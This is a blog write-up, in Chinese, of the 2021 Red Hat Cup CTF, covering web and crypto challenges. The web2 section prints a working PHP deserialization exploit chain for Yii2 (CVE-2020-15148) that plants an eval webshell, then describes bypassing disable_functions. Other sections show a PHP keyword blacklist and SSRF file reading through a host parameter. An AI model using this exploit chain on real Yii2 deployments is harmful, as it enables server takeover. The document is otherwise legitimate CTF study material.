2021红帽杯

这次比赛最后半小时看到别人那种坐火箭上分的感觉心里都裂开来了

web1

备份文件

)

<?php

#Really easy...

$file=fopen("flag.php","r") or die("Unable 2 open!");

$I_know_you_wanna_but_i_will_not_give_you_hhh = fread($file,filesize("flag.php"));


$hack=fopen("hack.php","w") or die("Unable 2 open");

$a=$_GET['code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
	die("you die");
}
if(strlen($a)>33){
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

根据提示，上个phpinfo();

​ flag{38e69165-0f27-4b44-b878-4fea5433893f}

web 2

在vendor\yiisoft\yii2\BaseYii.php处获得版本信息yii版本为2.0.32，查看资料存在CVE-2020-15148 反序列化漏洞

看到controllers\SiteController.php存在反序列化入口

确定路由和方法为r=site/about，传入参数为message【具体为啥自行百度漏洞原理】

具体利用链为

yii\db\BatchQueryResult::__destruct() -> Faker\Generator::__call() -> yii\rest\IndexAction::run()

构造POC如下，发现存在函数拦截，所以写了shell进去

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
 
        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = "file_put_contents('a.php','<?=eval(\$_POST[1]);')";
        }
    }
}
 
namespace Faker{
    use yii\rest\CreateAction;
 
    class Generator{
        protected $formatters;
 
        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
 
namespace yii\db{
    use Faker\Generator;
 
    class BatchQueryResult{
        private $_dataReader;
 
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

生成反序列字符串

写入

蚁剑连接，绕过disable_functions(从phpinfo获得disable_functions)

得到flag

flag{5db6abb9-677a-4c0f-9a35-8d00e56c2de5}

web 3

|
and
union
%20
//
--
-
"
limit

扫描到modify.php文件

看页面，猜测存在sssrf

看到”Your host has something wrong”，猜测参数是host，测试host=http://127.0.0.1，成功

ssrf读文件，得到flag

flag{3976b401-3920-4e09-b7f7-8247e829ba55}

web 4【未完成】

ssrf有拓展名的白名单

MISC 1 Crypto - primegame

找到了类似的题目
https://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/

根据类似题目构造解密脚本，并重命名为 XXX.sage 后缀。
脚本中ct值为out文件数据。

import math
from decimal import *
import random
import struct

getcontext().prec = int(100)

primes = [2]
for i in range(3, 100):
    f = True
    for j in primes:
        if i * i < j:
            break
        if i % j == 0:
            f = False
            break
    if f:
        primes.append(i)

keys = []
for i in range(len(primes)):
    keys.append(Decimal(int(primes[i])).ln())

arr = []
for v in keys:
    arr.append(int(v * int(16) ** int(64)))

# ct值为out文件的数据
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453

def encrypt(res):
    h = Decimal(int(0))
    for i in range(len(keys)):
        h += res[i] * keys[i]

    ct = int(h * int(16)**int(64))
    return ct

def f(N):
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N
        A[ln, i] = 64

    A[ln, ln] = ct // N

    res = A.LLL()

    for i in range(ln + 1):
        flag = True
        for j in range(ln):
            if -64 <= res[i][j] < 64:
                continue
            flag = False
            break
        if flag:
            vec = [int(v + 64) for v in res[i][:-1]]
            ret = encrypt(vec)
            if ret == ct:
                print(N, bytes(vec))
            else:
                print("NO", ret, bytes(vec))

for i in range(2, 10000):
    print(i)
    f(i)

安装SageMath工具

运行 XXX.sage 解密脚本

将代码ct的值更换为out文件的另一个数据
再次运行 XXX.sage 解密脚本

b'flag{715c39c3-1b46-4c23-8006-27b43eba2446}'

• 本文作者： LLMF
• 本文链接： http://ll-mf.github.io/2021-05-14-2021红帽杯.html
• 版权声明： 本博客所有文章除特别声明外，均采用 Apache License 2.0 许可协议。转载请注明出处！